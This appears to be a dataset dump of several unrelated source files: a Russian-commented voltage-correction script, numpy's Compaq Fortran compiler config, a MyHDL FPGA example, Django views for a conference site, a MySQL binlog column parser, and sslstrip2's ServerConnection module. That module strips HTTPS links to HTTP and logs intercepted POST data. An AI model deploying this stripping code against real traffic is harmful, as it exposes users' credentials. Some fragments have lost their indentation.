rem. : функции обратного вызова можно собрать в кортеж и внизу управлять
действиями по имени
"""
    # plugin selection
    def plot_plugin(string): # empty (no-op)
None
def plot_plugin_full(string):
print string
def _plot_item(msg, value):
print msg+" "+str(value)
ieee, mchip = f32conv.pack_f32_into_i32(value, _kPluginList["None"])
mchip = _print_formatter(mchip)
lst = list()
lst.append('; '+msg+' '+mchip+' ; '+str(value)+'\n')
iow.list2file(_kSets, lst)
def _print_string(msg):
lst = list()
lst.append('; '+msg+'\n')
iow.list2file(_kSets, lst)
def _plot_word(msg, word):
""" msg : Lhl Hhl"""
string = tc.byte2hex(int(word)%256) # L
string += ' '+ tc.byte2hex(int(word)/256) # H
print msg+' '+string
lst = list()
lst.append('; '+msg+' '+string+'\n')
iow.list2file(_kSets, lst)
def _new_line():
lst = list()
lst.append('\n')
iow.list2file(_kSets, lst)
def _eprint_value(name, value):
_eprint(name+' : '+str(value)+'\n')
def _wprint_value(name, value):
_wprint(name+' : '+str(value)+'\n')
def _nprint_value(name, value):
_nprint(name+' : '+str(value)+'\n')
# shortcuts
_nprint = co.printN
_wprint = co.printW
_eprint = co.printE
_kPluginList = {"None" : plot_plugin, 'Full':plot_plugin_full}
""" Расчет для УКВ ЧМ
@version : 1.0
@notes:
v 1.0
precond.:
1. попр. коэфф. всегда берется по модулю
2. при коррекции кода склад. или выч. в зависимости от знака коэфф. коррекции
contraints :
@math:
u_shift = u_shift_src+K*T [float32]
u_shift_code = to_code*(from_code*u_shift_src_code+K*T) =
u_shift_src+to_code*(K*T) = u_shift_src + int(T*(to_code*K)) =
u_shift_src+sign(K)*int(T*(to_code*abs(K)))
"""
    # Measured with a voltmeter
out_dac_voltage = 4.37
real_shift = 10.9
result = 0
# Run
abs_correcting_mult = math.fabs(correcting_mult) # ufloat
    dVwave = abs_correcting_mult*T # real volts
    dVdigital = _kOutProportion*dVwave # voltage in cu
    # Correction for the amplifier - the code value has to decrease
dVdigital *= (out_dac_voltage/real_shift)
    # correction factor
    K = dVdigital/T # cu(uint16)/oC, positive!
    # the initial shift code value used for the calculations
src_shift_code = _hex_word_to_int(src_shift_code)
# uintXX = uintXX+(or -)uintXX
    out_shift_code = src_shift_code+math.copysign(1, abs_correcting_mult)*dVdigital # the subtraction happens right here
# Report
msg = 'T oC :'
_plot_word(msg, T)
_plot_item(msg, T)
msg = 'dU, cu LH:'
_plot_word(msg, dVdigital)
msg = 'dU, cu :'
_plot_item(msg, dVdigital)
msg = 'Out shift value, cu LH:'
_plot_word(msg, out_shift_code)
msg = 'Out shift value, cu float32:'
_plot_item(msg, out_shift_code)
msg = 'K, cu(uint16)/oC:'
_print_string(msg+' '+str(K))
_plot_item('mK_to_Barg ', K)
_new_line()
if __name__=='__main__' :
    kCorrectingMult = 4.9*5*1e-3 # conversion coefficient for the value, V/oC
print 'kCorrectingMult', kCorrectingMult
T = 10
    src_shift_code = '0111' # original EEPROM value
calc_for_ukv(
kCorrectingMult,
T,
src_shift_code)
| apache-2.0 | -3,052,068,157,021,306,400 | 28.527273 | 106 | 0.574713 | false |
MSeifert04/numpy | numpy/distutils/fcompiler/compaq.py | 4 | 4109 |
#http://www.compaq.com/fortran/docs/
from __future__ import division, absolute_import, print_function
import os
import sys
from numpy.distutils.fcompiler import FCompiler
from numpy.distutils.compat import get_exception
from distutils.errors import DistutilsPlatformError
compilers = ['CompaqFCompiler']
if os.name != 'posix' or sys.platform[:6] == 'cygwin':
# Otherwise we'd get a false positive on posix systems with
# case-insensitive filesystems (like darwin), because we'll pick
# up /bin/df
compilers.append('CompaqVisualFCompiler')
class CompaqFCompiler(FCompiler):
compiler_type = 'compaq'
description = 'Compaq Fortran Compiler'
version_pattern = r'Compaq Fortran (?P<version>[^\s]*).*'
if sys.platform[:5]=='linux':
fc_exe = 'fort'
else:
fc_exe = 'f90'
executables = {
'version_cmd' : ['<F90>', "-version"],
'compiler_f77' : [fc_exe, "-f77rtl", "-fixed"],
'compiler_fix' : [fc_exe, "-fixed"],
'compiler_f90' : [fc_exe],
'linker_so' : ['<F90>'],
'archiver' : ["ar", "-cr"],
'ranlib' : ["ranlib"]
}
module_dir_switch = '-module ' # not tested
module_include_switch = '-I'
def get_flags(self):
return ['-assume no2underscore', '-nomixed_str_len_arg']
def get_flags_debug(self):
return ['-g', '-check bounds']
def get_flags_opt(self):
return ['-O4', '-align dcommons', '-assume bigarrays',
'-assume nozsize', '-math_library fast']
def get_flags_arch(self):
return ['-arch host', '-tune host']
def get_flags_linker_so(self):
if sys.platform[:5]=='linux':
return ['-shared']
return ['-shared', '-Wl,-expect_unresolved,*']
class CompaqVisualFCompiler(FCompiler):
compiler_type = 'compaqv'
description = 'DIGITAL or Compaq Visual Fortran Compiler'
version_pattern = (r'(DIGITAL|Compaq) Visual Fortran Optimizing Compiler'
r' Version (?P<version>[^\s]*).*')
compile_switch = '/compile_only'
object_switch = '/object:'
library_switch = '/OUT:' #No space after /OUT:!
static_lib_extension = ".lib"
static_lib_format = "%s%s"
module_dir_switch = '/module:'
module_include_switch = '/I'
ar_exe = 'lib.exe'
fc_exe = 'DF'
if sys.platform=='win32':
from numpy.distutils.msvccompiler import MSVCCompiler
try:
m = MSVCCompiler()
m.initialize()
ar_exe = m.lib
except DistutilsPlatformError:
pass
except AttributeError:
msg = get_exception()
if '_MSVCCompiler__root' in str(msg):
print('Ignoring "%s" (I think it is msvccompiler.py bug)' % (msg))
else:
raise
except IOError:
e = get_exception()
if not "vcvarsall.bat" in str(e):
print("Unexpected IOError in", __file__)
raise e
except ValueError:
e = get_exception()
if not "'path'" in str(e):
print("Unexpected ValueError in", __file__)
raise e
executables = {
'version_cmd' : ['<F90>', "/what"],
'compiler_f77' : [fc_exe, "/f77rtl", "/fixed"],
'compiler_fix' : [fc_exe, "/fixed"],
'compiler_f90' : [fc_exe],
'linker_so' : ['<F90>'],
'archiver' : [ar_exe, "/OUT:"],
'ranlib' : None
}
def get_flags(self):
return ['/nologo', '/MD', '/WX', '/iface=(cref,nomixed_str_len_arg)',
'/names:lowercase', '/assume:underscore']
def get_flags_opt(self):
return ['/Ox', '/fast', '/optimize:5', '/unroll:0', '/math_library:fast']
def get_flags_arch(self):
return ['/threads']
def get_flags_debug(self):
return ['/debug']
if __name__ == '__main__':
from distutils import log
log.set_verbosity(2)
from numpy.distutils import customized_fcompiler
print(customized_fcompiler(compiler='compaq').get_version())
| bsd-3-clause | -509,323,686,165,539,700 | 31.611111 | 82 | 0.55926 | false |
cfelton/rhea | examples/boards/de0nano/converters/de0nano_converters.py | 1 | 4159 |
"""
This example uses the A/D converter and the accelerometer.
The example retrieves the samples from the converters and displays them on the
LEDs while driving the LT24 LCD with a color-bar test pattern.
"""
from __future__ import division
import myhdl
from myhdl import (Signal, intbv, always_comb, always_seq,
always, TristateSignal, concat, instances)
from rhea.system import Clock, Reset, Global, FIFOBus
from rhea.cores.converters import adc128s022
from rhea.cores.spi import spi_controller
from rhea.cores.spi import SPIBus
from rhea.cores.video import VideoMemory
from rhea.cores.video import color_bars
from rhea.cores.video.lcd import lt24lcd
from rhea.cores.video.lcd import LT24Interface
from rhea.cores.misc import glbl_timer_ticks
import rhea.build as build
from rhea.build.boards import get_board
# board definition for the automated flow
brd, flow = None, None
@myhdl.block
def de0nano_converters(clock, reset, led,
# ADC signals
adc_cs_n, adc_saddr, adc_sdat, adc_sclk,
# Accelerometer and I2C signals
i2c_sclk, i2c_sdat, g_sensor_cs_n, g_sensor_int,
# LT24 LCD display signals
lcd_on, lcd_resetn, lcd_csn, lcd_rs,
lcd_wrn, lcd_rdn, lcd_data
):
"""
The port names are the same as those in the board definition
(names in the user manual) for automatic mapping by the
rhea.build automation.
"""
# signals and interfaces
glbl = Global(clock, reset)
adcbus = SPIBus()
adcbus.mosi, adcbus.miso, adcbus.csn, adcbus.sck = (
adc_saddr, adc_sdat, adc_cs_n, adc_sclk)
fifobus = FIFOBus(width=16)
channel = Signal(intbv(0, min=0, max=8))
# ----------------------------------------------------------------
# global ticks
t_inst = glbl_timer_ticks(glbl, include_seconds=True, user_timer=16)
# ----------------------------------------------------------------
# instantiate the ADC controller (retieves samples)
conv_inst = adc128s022(glbl, fifobus, adcbus, channel)
# read the samples out of the FIFO interface
fiford = Signal(bool(0))
@always(clock.posedge)
def beh_read():
        fiford.next = not fifobus.empty
@always_comb
def beh_read_gate():
fifobus.read.next = fiford and not fifobus.empty
# for now assign the samples to the LEDs for viewing
heartbeat = Signal(bool(0))
@always_seq(clock.posedge, reset=reset)
def beh_leds():
if glbl.tick_sec:
heartbeat.next = not heartbeat
led.next = concat(fifobus.read_data[12:5], heartbeat)
# ----------------------------------------------------------------
# LCD dislay
lcd = LT24Interface()
resolution, color_depth = lcd.resolution, lcd.color_depth
lcd.assign(
lcd_on, lcd_resetn, lcd_csn, lcd_rs, lcd_wrn, lcd_rdn, lcd_data
)
# color bars and the interface between video source-n-sink
vmem = VideoMemory(resolution=resolution, color_depth=color_depth)
bar_inst = color_bars(glbl, vmem, resolution=resolution,
color_depth=color_depth)
# LCD video driver
lcd_inst = lt24lcd(glbl, vmem, lcd)
return myhdl.instances()
# the default port map
# @todo: should be able to extact this from the board
# definition:
# portmap = brd.map_ports(de0nano_converters)
de0nano_converters.portmap = {
'clock': Clock(0, frequency=50e6),
'reset': Reset(0, active=0, isasync=True),
'led': Signal(intbv(0)[8:]),
'adc_cs_n': Signal(bool(1)),
'adc_saddr': Signal(bool(1)),
'adc_sdat': Signal(bool(1)),
'adc_sclk': Signal(bool(1)),
'i2c_sclk': Signal(bool(1)),
'i2c_sdat': TristateSignal(bool(0)),
'g_sensor_cs_n': Signal(bool(1)),
'g_sensor_int': Signal(bool(1)),
'lcd_on': Signal(bool(1)),
'lcd_resetn': Signal(bool(1)),
'lcd_csn': Signal(bool(1)),
'lcd_rs': Signal(bool(1)),
'lcd_wrn': Signal(bool(1)),
'lcd_rdn': Signal(bool(1)),
'lcd_data': Signal(intbv(0)[16:])
}
def build():
global brd, flow
brd = get_board('de0nano')
flow = brd.get_flow(top=de0nano_converters)
flow.run()
def program():
if flow is not None:
flow.program()
if __name__ == '__main__':
build()
program()
| mit | -4,251,928,756,813,380,000 | 28.920863 | 72 | 0.620101 | false |
enjaz/enjaz | newhpc/views.py | 2 | 14753 | # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404
from django.views.decorators import csrf
from django.http import JsonResponse
from django.shortcuts import render
from core import decorators
from .models import FaqCategory, FaqQuestion, BlogPostArabic, BlogPostEnglish, NewsletterMembership, BlogVideo, Speaker
from .forms import *
from events.models import Event, Session, TimeSlot,SessionRegistration
from django.utils import timezone
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.core.urlresolvers import reverse
import events.utils
from django.contrib.auth.models import User
# enjazportal.com/riyadh HPC Riyadh :
def riy_ar_index(request):
speakers = Speaker.objects.filter(is_top_speaker=True, version__year='2020')
context = {'speakers':speakers,}
return render(request,'newhpc/arabic/riy_ar_index.html',context)
def riy_en_index(request):
speakers = Speaker.objects.filter(is_top_speaker=True, version__year='2020')
context = {'speakers': speakers, }
return render(request,'newhpc/english/riy_en_index.html',context)
def riy_coming_soon(request):
context = {}
return render(request,'newhpc/arabic/riy_coming_soon.html',context)
# def riy_ar_registration(request):
# context = {}
# return render(request,'newhpc/arabic/riy_ar_registeration.html',context)
@login_required
def riy_ar_registration(request,event_city):
if event_city == 'riyadh':
event = Event.objects.get(code_name='hpc2020-r')
template = 'newhpc/arabic/riy_ar_eng_registeration_test.html'
elif event_city == 'jeddah':
event = Event.objects.get(code_name='hpc2020-j')
template = 'newhpc/english/jeddah/jed_en_registration.html'
elif event_city == 'alahsa':
event = Event.objects.get(code_name='hpc2020-a')
template ='newhpc/english/alahsa/ahs_en_registration.html'
timeslots = TimeSlot.objects.filter(event=event ,parent__isnull=True)
session = Session.objects.get(event=event, code_name='general')
registration = request.user.session_registrations.filter(session__event=event, session__code_name='general').first()
if registration:
registred_to_program = True
else :
registred_to_program = False
if timeslots.filter(image__isnull=False):
have_image = True
else:
have_image = False
barcode_user = request.user
text = ("{:0%s}" % events.utils.BARCODE_LENGTH).format(barcode_user.pk)
qrcode_value = events.utils.get_barcode(text)
user_registrations = request.user.session_registrations.filter(session__event=event,is_deleted=False)
context = {'timeslots': timeslots,
'event': event,
'have_image': have_image,
'registred_to_program': registred_to_program,
'qrcode_value': qrcode_value,
'text': text,
'barcode_user': barcode_user,
'user_registrations':user_registrations
}
if event.registration_opening_date and timezone.now() < event.registration_opening_date and not request.user.is_superuser and not events.utils.is_organizing_team_member(request.user, event) and not events.utils.is_in_entry_team(request.user):
raise Http404
elif event.registration_closing_date and timezone.now() > event.registration_closing_date:
return HttpResponseRedirect(reverse('events:registration_closed',
args=(event.code_name,)))
return render(request, template, context)
@login_required
def register_general_program(request,event_city):
if event_city == 'riyadh':
event = Event.objects.get(code_name='hpc2020-r')
elif event_city == 'jeddah':
event = Event.objects.get(code_name='hpc2020-j')
elif event_city == 'alahsa':
event = Event.objects.get(code_name='hpc2020-a')
session = Session.objects.get(event=event, code_name='general')
registration = SessionRegistration.objects.filter(session=session, user=request.user).first()
if not registration:
registration = SessionRegistration.objects.create(session=session,
user=request.user,
is_approved=True)
return HttpResponseRedirect(reverse('newhpc:riy_ar_registration',
args=(event_city,)))
@login_required
def list_sessions(request, event_code_name, pk):
event = get_object_or_404(Event, code_name=event_code_name)
if event.code_name == 'hpc2020-r':
template = 'newhpc/sessions_list.html'
elif event.code_name == 'hpc2020-j':
template = 'newhpc/english/jeddah/session_list.html'
elif event.code_name == 'hpc2020-a' :
template = 'newhpc/english/alahsa/session_list.html'
timeslot = TimeSlot.objects.get(event=event, pk=pk)
children_total = timeslot.session_set.count() + timeslot.children.count()
if timeslot.limit:
remaining_number = timeslot.limit - request.user.session_registrations.filter(session__time_slot=timeslot,is_deleted=False).count()
else:
remaining_number = 1
limit = events.utils.get_timeslot_limit(timeslot)
context = {'timeslot': timeslot,
'event': event,
'children_total':children_total,
'remaining_number':remaining_number,
'limit':limit}
if event.registration_opening_date and timezone.now() < event.registration_opening_date and \
not request.user.is_superuser and \
not events.utils.is_organizing_team_member(request.user, event) and \
not events.utils.is_in_entry_team(request.user):
raise Http404
elif event.registration_closing_date and timezone.now() > event.registration_closing_date:
return HttpResponseRedirect(reverse('events:registration_closed',
args=(event.code_name,)))
return render(request, template , context)
def riy_en_registration(request):
context = {}
return render(request,'newhpc/english/riy_en_registeration.html',context)
def riy_ar_exhibition(request):
context = {}
return render(request,'newhpc/arabic/riy_ar_exhibition.html',context)
def riy_en_exhibition(request):
context = {}
return render(request,'newhpc/english/riy_en_exhibition.html',context)
def riy_en_research(request):
context = {}
return render(request,'newhpc/english/riy_en_research.html',context)
def show_about(request, lang):
if lang == 'ar':
lang2 = 'arabic'
elif lang == 'en':
lang2 = 'english'
return render(request, 'newhpc/'+lang2+'/riy_'+lang+'_about.html')
@login_required
def add_FaqCategory(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = FaqCategory()
form = FaqCategoryForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = FaqCategoryForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_faq_category.html', context)
@login_required
def add_FaqQuestion(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = FaqQuestion()
form = FaqQuestionForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = FaqQuestionForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_faq_question.html', context)
def list_FAQs(request, lang):
if lang == 'ar':
lang2 = 'arabic'
elif lang == 'en':
lang2 = 'english'
categories = FaqCategory.objects.all()
tech_qs = FaqQuestion.objects.filter(is_tech=True)
non_tech_qs = FaqQuestion.objects.filter(is_tech=False)
faqs = FaqQuestion.objects.all()
context = {'categories': categories,
'tech_qs': tech_qs,
'non_tech_qs': non_tech_qs}
return render(request, 'newhpc/'+lang2+'/'+lang+'_list_FAQ.html', context)
@login_required
def add_prev_version(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = PreviousVersion()
form = PreviousVersionForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = PreviousVersionForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_prev_version.html', context)
@login_required
def add_prev_statistic(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = PreviousStatistics()
form = PreviousStatisticsForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = PreviousStatisticsForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_prev_statistics.html', context)
@login_required
def add_leader(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = HpcLeader()
form = HpcLeaderForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = HpcLeaderForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_leader.html', context)
@login_required
def add_media_sponsor(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = MediaSponser()
form = MediaSponserForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = MediaSponserForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_media_sponsor.html', context)
@login_required
def add_winner(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = Winner()
form = WinnerForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = WinnerForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_winner.html', context)
def admin_prev_versions(request):
return render(request, 'newhpc/english/administrative/prev_versions.html')
def list_prev_versions(request):
versions = PreviousVersion.objects.all()
context = {'versions': versions}
return render(request, 'newhpc/arabic/ar_prev_versions.html', context)
def show_version(request, version_year):
version = PreviousVersion.objects.get(year=version_year)
speakers = version.speaker_set.filter(is_top_speaker=True)
context = {'version': version,
'speakers': speakers}
return render(request, 'newhpc/arabic/ar_show_version.html', context)
def show_speakers(request, version_year):
version = PreviousVersion.objects.get(year=version_year)
context = {'version': version,
'range': range(2)}
return render(request, 'newhpc/arabic/all_speakers.html', context)
def main_media(request, lang):
if lang == 'ar':
lang2 = 'arabic'
posts = BlogPostArabic.objects.all()
elif lang == 'en':
lang2 = 'english'
posts = BlogPostEnglish.objects.all()
videos = BlogVideo.objects.all()
context = {'posts': posts, 'videos': videos}
return render(request, 'newhpc/'+lang2+'/main_media.html', context)
def show_post(request, lang, post_id):
if lang == 'ar':
lang2 = 'arabic'
post = get_object_or_404(BlogPostArabic, pk=post_id)
elif lang == 'en':
lang2 = 'english'
post = get_object_or_404(BlogPostEnglish, pk=post_id)
context = {'post': post}
return render(request, 'newhpc/'+lang2+'/show_post.html', context)
@decorators.post_only
@decorators.ajax_only
@csrf.csrf_exempt
def handle_newsletter_signup(request):
form = NewsletterMembershipForm(request.POST)
response_data = {}
if form.is_valid():
email = form.cleaned_data['email']
previous_membership = NewsletterMembership.objects.filter(email=email).exists()
if previous_membership:
response_data['message'] = 'previous'
raise Exception("previous")
else:
response_data['message'] = 'success'
form.save()
else:
response_data['message'] = 'invalid'
raise Exception("invalid")
return JsonResponse(response_data)
@login_required
def list_newsletter_members(request):
if not request.user.is_superuser:
raise PermissionDenied
members = NewsletterMembership.objects.all()
context = {'members': members}
return render(request, 'newhpc/english/administrative/list_news_members.html', context)
def show_media_file(request, lang):
return HttpResponseRedirect('/static/static/newhpc/media/file.pdf')
def list_speakers(request, lang):
if lang == 'ar':
lang2 = 'arabic'
elif lang == 'en':
lang2 = 'english'
    # TODO: Fix the hard-coded current year used in this filter
speakers = Speaker.objects.filter(version__year="2020")
context = {'speakers': speakers, 'year': '2020'}
return render(request, 'newhpc/'+lang2+'/riy_list_speakers.html', context)
# enjazportal.com/jeddah HPC Jeddah :
def jed_en_research(request):
context = {}
return render(request,'newhpc/english/jeddah/jed_en_research.html',context)
# enjazportal.com/alahsa HPC Al Ahsa :
def ahs_en_research(request):
context = {}
return render(request,'newhpc/english/alahsa/ahs_en_research.html',context)
def show_abstracts_booklet(request, lang):
return HttpResponseRedirect('/static/static/newhpc/media/abstracts booklet.pdf')
# invite to ceremony
def invite_to_ceremony(request, invitee_id):
try:
invitee = User.objects.get(username=invitee_id)
inv_exists = True
    except User.DoesNotExist:
invitee = invitee_id
inv_exists = False
context = {'invitee': invitee, 'inv_exists': inv_exists}
return render(request, 'newhpc/arabic/invite_ceremony.html', context)
| agpl-3.0 | -8,234,721,806,613,222,000 | 37.023196 | 246 | 0.664204 | false |
58daojia-dba/mysqlbinlog_flashback | pymysqlreplication/column.py | 1 | 3452 | # -*- coding: utf-8 -*-
import struct
from .constants import FIELD_TYPE
class Column(object):
"""Definition of a column
"""
def __init__(self, *args, **kwargs):
if len(args) == 3:
self.__parse_column_definition(*args)
else:
self.__dict__.update(kwargs)
def __parse_column_definition(self, column_type, column_schema, packet):
self.type = column_type
self.name = column_schema["COLUMN_NAME"]
self.collation_name = column_schema["COLLATION_NAME"]
self.character_set_name = column_schema["CHARACTER_SET_NAME"]
self.comment = column_schema["COLUMN_COMMENT"]
self.unsigned = column_schema["COLUMN_TYPE"].find("unsigned") != -1
self.type_is_bool = False
self.is_primary = column_schema["COLUMN_KEY"] == "PRI"
if self.type == FIELD_TYPE.VARCHAR:
self.max_length = struct.unpack('<H', packet.read(2))[0]
elif self.type == FIELD_TYPE.DOUBLE:
self.size = packet.read_uint8()
elif self.type == FIELD_TYPE.FLOAT:
self.size = packet.read_uint8()
elif self.type == FIELD_TYPE.TIMESTAMP2:
self.fsp = packet.read_uint8()
elif self.type == FIELD_TYPE.DATETIME2:
self.fsp = packet.read_uint8()
elif self.type == FIELD_TYPE.TIME2:
self.fsp = packet.read_uint8()
elif self.type == FIELD_TYPE.TINY and \
column_schema["COLUMN_TYPE"] == "tinyint(1)":
self.type_is_bool = True
elif self.type == FIELD_TYPE.VAR_STRING or \
self.type == FIELD_TYPE.STRING:
self.__read_string_metadata(packet, column_schema)
elif self.type == FIELD_TYPE.BLOB:
self.length_size = packet.read_uint8()
elif self.type == FIELD_TYPE.GEOMETRY:
self.length_size = packet.read_uint8()
elif self.type == FIELD_TYPE.NEWDECIMAL:
self.precision = packet.read_uint8()
self.decimals = packet.read_uint8()
elif self.type == FIELD_TYPE.BIT:
bits = packet.read_uint8()
bytes = packet.read_uint8()
self.bits = (bytes * 8) + bits
self.bytes = int((self.bits + 7) / 8)
def __read_string_metadata(self, packet, column_schema):
metadata = (packet.read_uint8() << 8) + packet.read_uint8()
real_type = metadata >> 8
if real_type == FIELD_TYPE.SET or real_type == FIELD_TYPE.ENUM:
self.type = real_type
self.size = metadata & 0x00ff
self.__read_enum_metadata(column_schema)
else:
self.max_length = (((metadata >> 4) & 0x300) ^ 0x300) \
+ (metadata & 0x00ff)
def __read_enum_metadata(self, column_schema):
enums = column_schema["COLUMN_TYPE"]
if self.type == FIELD_TYPE.ENUM:
self.enum_values = enums.replace('enum(', '')\
.replace(')', '').replace('\'', '').split(',')
else:
self.set_values = enums.replace('set(', '')\
.replace(')', '').replace('\'', '').split(',')
def __eq__(self, other):
return self.data == other.data
def __ne__(self, other):
return not self.__eq__(other)
def serializable_data(self):
return self.data
@property
def data(self):
return dict((k, v) for (k, v) in self.__dict__.items() if not k.startswith('_'))
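# A brief illustrative construction (the field values are invented): when
# Column is given keyword arguments instead of a packet, __init__ simply
# copies them onto the instance, so metadata can be rebuilt from cached
# schema information.
def _example_column():
    return Column(name='username', type=FIELD_TYPE.VARCHAR,
                  collation_name='utf8_general_ci', character_set_name='utf8',
                  max_length=255, unsigned=False, type_is_bool=False,
                  is_primary=False)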
| apache-2.0 | -3,951,002,800,386,004,000 | 37.355556 | 88 | 0.554751 | false |
IwraStudios/NoSSL | sslstrip2-master/build/lib.linux-i686-2.7/sslstrip/ServerConnection.py | 10 | 6461 | # Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string, random, zlib, gzip, StringIO
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
    comes back is examined. The headers we don't like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
# urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getLogLevel(self):
return logging.DEBUG
def getPostPrefix(self):
return "POST"
def sendRequest(self):
logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri))
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.items():
logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))
self.transport.write(self.postData)
def connectionMade(self):
logging.log(self.getLogLevel(), "HTTP connection made.")
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
logging.debug("Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
HTTPClient.handleResponseEnd(self)
def handleResponse(self, data):
if (self.isCompressed):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
#logging.log(self.getLogLevel(), "Read from server:\n" + data)
logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data)
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
self.client.write(data)
self.shutdown()
def replaceSecureLinks(self, data):
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
iter2 = re.finditer(ServerConnection.urlToken1, data)
for match in iter2:
encontrado = match.group()
logging.debug("Token find: "+encontrado+", parsing...")
iter2 = re.finditer(ServerConnection.urlToken2, data)
for match in iter2:
encontrado = match.group()
logging.debug("Token find: "+encontrado+", parsing....")
#data = re.sub(ServerConnection.urlToken2, r'\1?ssltoken=1',data)
#data = re.sub(ServerConnection.urlToken1, r'\1ssltoken=1&',data)
return re.sub(ServerConnection.urlType, 'http://', data)
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
self.client.finish()
self.transport.loseConnection()
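# A hedged illustration of what the regular expressions above do to a
# response body; the HTML fragment is invented for the example.
def _demo_https_rewrite():
    body = '<a href="https://example.com:443/login">sign in</a>'
    # Drop the explicit port, then downgrade the scheme, mirroring the two
    # substitutions performed in replaceSecureLinks().
    body = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', body)
    return re.sub(ServerConnection.urlType, 'http://', body)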
| gpl-3.0 | -7,475,276,025,798,142,000 | 36.346821 | 110 | 0.609658 | false |
nachandr/cfme_tests | cfme/tests/automate/test_common_methods.py | 2 | 15900 | """This module contains tests that test the universally applicable canned methods in Automate."""
from datetime import date
from datetime import timedelta
from textwrap import dedent
import fauxfactory
import pytest
from widgetastic.utils import partial_match
from widgetastic_patternfly import CandidateNotFound
from cfme import test_requirements
from cfme.automate.simulation import simulate
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
